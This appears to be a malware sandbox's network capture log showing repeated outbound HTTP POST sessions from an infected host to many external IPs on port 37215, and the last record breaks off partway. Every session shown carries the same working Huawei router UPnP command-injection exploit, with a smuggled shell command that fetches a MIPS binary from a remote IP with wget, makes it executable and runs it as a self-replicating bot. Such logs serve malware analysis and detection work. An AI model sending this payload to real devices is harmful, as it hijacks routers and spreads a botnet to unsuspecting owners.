20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2163192.168.2.133472841.154.142.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594403982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2164192.168.2.1340970100.190.86.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594496012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2165192.168.2.1338140197.214.29.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594525099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2166192.168.2.1339570197.196.145.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594608068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2167192.168.2.1352978157.21.186.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594625950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2168192.168.2.1359532157.213.225.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594710112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2169192.168.2.1338902195.159.254.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594759941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2170192.168.2.133709832.32.230.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594789982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2171192.168.2.1333678157.222.94.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594805002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2172192.168.2.1348778197.35.88.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594851017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2173192.168.2.1354196197.7.155.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594851017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
